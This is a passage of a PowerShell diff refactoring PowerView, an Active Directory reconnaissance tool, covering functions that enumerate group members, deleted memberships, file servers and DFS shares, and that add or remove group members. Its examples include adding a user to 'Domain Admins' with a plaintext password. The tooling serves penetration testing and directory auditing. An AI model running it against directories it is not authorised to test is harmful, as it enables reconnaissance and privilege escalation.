only user accounts will be returned." + $GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))" + $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName')) + $Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]} + } + $Null = $SearcherArguments.Remove('Raw') + } + else { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^CN=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $GroupSearcher = Get-DomainSearcher @SearcherArguments + if (-not $GroupSearcher) { + Write-Warning "[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $GroupName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$GroupName)" + $SearcherArguments['Domain'] = $GroupDomain + Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'" + $GroupSearcher = Get-DomainSearcher @SearcherArguments + } + } + else { + $IdentityFilter += "(samAccountName=$IdentityInstance)" + } + } + + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + $GroupSearcher.filter = "(&(objectCategory=group)$Filter)" + Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)" + try { + $Result = $GroupSearcher.FindOne() + } + catch { + Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_" + $Members = @() + } + + $GroupFoundName = '' + $GroupFoundDN = '' + + if ($Result) { + $Members = $Result.properties.item('member') + + if ($Members.count -eq 0) { + # ranged searching, thanks @meatballs__ ! + $Finished = $False + $Bottom = 0 + $Top = 0 + + while (-not $Finished) { + $Top = $Bottom + 1499 + $MemberRange="member;range=$Bottom-$Top" + $Bottom += 1500 + $Null = $GroupSearcher.PropertiesToLoad.Clear() + $Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange") + $Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname') + $Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname') + + try { + $Result = $GroupSearcher.FindOne() + $RangedProperty = $Result.Properties.PropertyNames -like "member;range=*" + $Members += $Result.Properties.item($RangedProperty) + $GroupFoundName = $Result.properties.item('samaccountname')[0] + $GroupFoundDN = $Result.properties.item('distinguishedname')[0] + + if ($Members.count -eq 0) { + $Finished = $True + } + } + catch [System.Management.Automation.MethodInvocationException] { + $Finished = $True + } + } + } + else { + $GroupFoundName = $Result.properties.item('samaccountname')[0] + $GroupFoundDN = $Result.properties.item('distinguishedname')[0] + $Members += $Result.Properties.item($RangedProperty) + } + + if ($PSBoundParameters['Domain']) { + $GroupFoundDomain = $Domain + } + else { + # if a domain isn't passed, try to extract it from the found group distinguished name + if ($GroupFoundDN) { + $GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + } + } + + ForEach ($Member in $Members) { + if ($Recurse -and $UseMatchingRule) { + $Properties = $_.Properties + } + else { + $ObjectSearcherArguments = $SearcherArguments.Clone() + $ObjectSearcherArguments['Identity'] = $Member + $ObjectSearcherArguments['Raw'] = $True + $ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass' + $Object = Get-DomainObject @ObjectSearcherArguments + $Properties = $Object.Properties + } + + if ($Properties) { + $GroupMember = New-Object PSObject + $GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain + $GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName + $GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN + + if ($Properties.objectsid) { + $MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value) + } + else { + $MemberSID = $Null + } + + try { + $MemberDN = $Properties.distinguishedname[0] + if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') { + try { + if (-not $MemberSID) { + $MemberSID = $Properties.cn[0] + } + $MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments + + if ($MemberSimpleName) { + $MemberDomain = $MemberSimpleName.Split('@')[1] + } + else { + Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN" + $MemberDomain = $Null + } + } + catch { + Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN" + $MemberDomain = $Null + } + } else { - Get-NetGroupMember -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize + # extract the FQDN from the Distinguished Name + $MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + } + } + catch { + $MemberDN = $Null + $MemberDomain = $Null + } + + if ($Properties.samaccountname) { + # forest users have the samAccountName set + $MemberName = $Properties.samaccountname[0] + } + else { + # external trust users have a SID, so convert it + try { + $MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments + } + catch { + # if there's a problem contacting the domain to resolve the SID + $MemberName = $Properties.cn[0] } } + + if ($Properties.objectclass -match 'computer') { + $MemberObjectClass = 'computer' + } + elseif ($Properties.objectclass -match 'group') { + $MemberObjectClass = 'group' + } + elseif ($Properties.objectclass -match 'user') { + $MemberObjectClass = 'user' + } + else { + $MemberObjectClass = $Null + } + $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain + $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName + $GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN + $GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass + $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID + $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember') + $GroupMember + + # if we're doing manual recursion + if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) { + Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN" + $SearcherArguments['Identity'] = $MemberDN + $Null = $SearcherArguments.Remove('Properties') + Get-DomainGroupMember @SearcherArguments + } + } + } + $GroupSearcher.dispose() + } + } +} + + +function Get-DomainGroupMemberDeleted { +<# +.SYNOPSIS + +Returns information on group members that were removed from the specified +group identity. Accomplished by searching the linked attribute replication +metadata for the group using Get-DomainObjectLinkedAttributeHistory. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectLinkedAttributeHistory + +.DESCRIPTION + +Wraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute +replication metadata for the specified group. These are cases where the +'Version' attribute of group member in the replication metadata is even. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGroupMemberDeleted | Group-Object GroupDN + +Count Name Group +----- ---- ----- + 2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test... + 3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t... + +.EXAMPLE + +Get-DomainGroupMemberDeleted "Domain Admins" -Domain testlab.local + + +GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +MemberDN : CN=testuser,CN=Users,DC=testlab,DC=local +TimeFirstAdded : 2017-06-13T23:07:43Z +TimeDeleted : 2017-06-13T23:26:17Z +LastOriginatingChange : 2017-06-13T23:26:17Z +TimesAdded : 2 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +MemberDN : CN=dfm,CN=Users,DC=testlab,DC=local +TimeFirstAdded : 2017-06-13T22:20:02Z +TimeDeleted : 2017-06-13T23:26:17Z +LastOriginatingChange : 2017-06-13T23:26:17Z +TimesAdded : 5 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.DomainGroupMemberDeleted + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.DomainGroupMemberDeleted')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replvaluemetadata','distinguishedname' + 'Raw' = $True + 'LDAPFilter' = '(objectCategory=group)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'GroupDN' $ObjectDN + $Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn + $Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated + $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2) + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted') + $Output + } + } + else { + Write-Verbose "[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Add-DomainGroupMember { +<# +.SYNOPSIS + +Adds a domain user (or group) to an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For +each entry in -Members, each member identity is similarly searched for and added +to the group. + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to add members to. + +.PARAMETER Members + +One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName +(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' + +Adds harmj0y to 'Domain Admins' in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('MemberIdentity', 'Member', 'DistinguishedName')] + [String[]] + $Members, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ContextArguments = @{ + 'Identity' = $Identity + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + + $GroupContext = Get-PrincipalContext @ContextArguments + + if ($GroupContext) { + try { + $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity) + } + catch { + Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_" + } + } + } + + PROCESS { + if ($Group) { + ForEach ($Member in $Members) { + if ($Member -match '.+\\.+') { + $ContextArguments['Identity'] = $Member + $UserContext = Get-PrincipalContext @ContextArguments + if ($UserContext) { + $UserIdentity = $UserContext.Identity + } + } + else { + $UserContext = $GroupContext + $UserIdentity = $Member + } + Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'" + $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity) + $Group.Members.Add($Member) + $Group.Save() + } + } + } +} + + +function Remove-DomainGroupMember { +<# +.SYNOPSIS + +Removes a domain user (or group) from an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For +each entry in -Members, each member identity is similarly searched for and removed +from the group. + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to remove members from. + +.PARAMETER Members + +One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName +(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' + +Removes harmj0y from 'Domain Admins' in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Removes harmj0y from 'Domain Admins' in the current domain using the alternate credentials. + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('MemberIdentity', 'Member', 'DistinguishedName')] + [String[]] + $Members, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ContextArguments = @{ + 'Identity' = $Identity + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + + $GroupContext = Get-PrincipalContext @ContextArguments + + if ($GroupContext) { + try { + $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity) + } + catch { + Write-Warning "[Remove-DomainGroupMember] Error finding the group identity '$Identity' : $_" + } + } + } + + PROCESS { + if ($Group) { + ForEach ($Member in $Members) { + if ($Member -match '.+\\.+') { + $ContextArguments['Identity'] = $Member + $UserContext = Get-PrincipalContext @ContextArguments + if ($UserContext) { + $UserIdentity = $UserContext.Identity + } + } + else { + $UserContext = $GroupContext + $UserIdentity = $Member } + Write-Verbose "[Remove-DomainGroupMember] Removing member '$Member' from group '$Identity'" + $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity) + $Group.Members.Remove($Member) + $Group.Save() } } } } -function Get-NetFileServer { -<# - .SYNOPSIS +function Get-DomainFileServer { +<# +.SYNOPSIS + +Returns a list of servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +.DESCRIPTION + +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Returns a list of all file servers extracted from user - homedirectory, scriptpath, and profilepath fields. +.PARAMETER Tombstone - .PARAMETER Domain +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - The domain to query for user file servers, defaults to the current domain. +.PARAMETER Credential - .PARAMETER DomainController +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - Domain controller to reflect LDAP queries through. +.EXAMPLE - .PARAMETER TargetUsers +Get-DomainFileServer - An array of users to query for file servers. +Returns active file servers for the current domain. - .PARAMETER PageSize +.EXAMPLE - The PageSize to set for the LDAP searcher object. +Get-DomainFileServer -Domain testing.local - .PARAMETER Credential +Returns active file servers for the 'testing.local' domain. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.EXAMPLE - .EXAMPLE +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred - PS C:\> Get-NetFileServer - - Returns active file servers. +.OUTPUTS - .EXAMPLE +String - PS C:\> Get-NetFileServer -Domain testing - - Returns active file servers for the 'testing' domain. +One or more strings representing file server names. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] [CmdletBinding()] - param( - [String] + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] [String] - $DomainController, + $LDAPFilter, - [String[]] - $TargetUsers, + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, - [ValidateRange(1,10000)] + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ServerTimeLimit, + + [Switch] + $Tombstone, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - function SplitPath { - # short internal helper to split UNC server paths - param([String]$Path) + BEGIN { + function Split-Path { + # short internal helper to split UNC server paths + Param([String]$Path) - if ($Path -and ($Path.split("\\").Count -ge 3)) { - $Temp = $Path.split("\\")[2] - if($Temp -and ($Temp -ne '')) { - $Temp + if ($Path -and ($Path.split('\\').Count -ge 3)) { + $Temp = $Path.split('\\')[2] + if ($Temp -and ($Temp -ne '')) { + $Temp + } } } + + $SearcherArguments = @{ + 'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))' + 'Properties' = 'homedirectory,scriptpath,profilepath' + } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } } - $filter = "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(scriptpath=*)(homedirectory=*)(profilepath=*))" - Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -Filter $filter | Where-Object {$_} | Where-Object { - # filter for any target users - if($TargetUsers) { - $TargetUsers -Match $_.samAccountName - } - else { $True } - } | ForEach-Object { - # split out every potential file server path - if($_.homedirectory) { - SplitPath($_.homedirectory) - } - if($_.scriptpath) { - SplitPath($_.scriptpath) - } - if($_.profilepath) { - SplitPath($_.profilepath) - } - } | Where-Object {$_} | Sort-Object -Unique + PROCESS { + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + # get all results w/o the pipeline and uniquify them (I know it's not pretty) + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } + else { + $UserSearcher = Get-DomainSearcher @SearcherArguments + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } } -function Get-DFSshare { +function Get-DomainDFSShare { <# - .SYNOPSIS +.SYNOPSIS + +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domains. - Returns a list of all fault-tolerant distributed file - systems for a given domain. +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher - .PARAMETER Version +.DESCRIPTION - The version of DFS to query for servers. - 1/v1, 2/v2, or all +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. - .PARAMETER Domain +.PARAMETER Domain - The domain to query for user DFS shares, defaults to the current domain. +Specifies the domains to use for the query, defaults to the current domain. - .PARAMETER DomainController +.PARAMETER SearchBase - Domain controller to reflect LDAP queries through. +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - .PARAMETER ADSpath +.PARAMETER Server - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER PageSize +.PARAMETER SearchScope - The PageSize to set for the LDAP searcher object. +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - .PARAMETER Credential +.PARAMETER ResultPageSize - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +Specifies the PageSize to set for the LDAP searcher object. - .EXAMPLE +.PARAMETER ServerTimeLimit - PS C:\> Get-DFSshare +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - Returns all distributed file system shares for the current domain. +.PARAMETER Tombstone - .EXAMPLE +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - PS C:\> Get-DFSshare -Domain test +.PARAMETER Credential - Returns all distributed file system shares for the 'test' domain. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDFSShare + +Returns 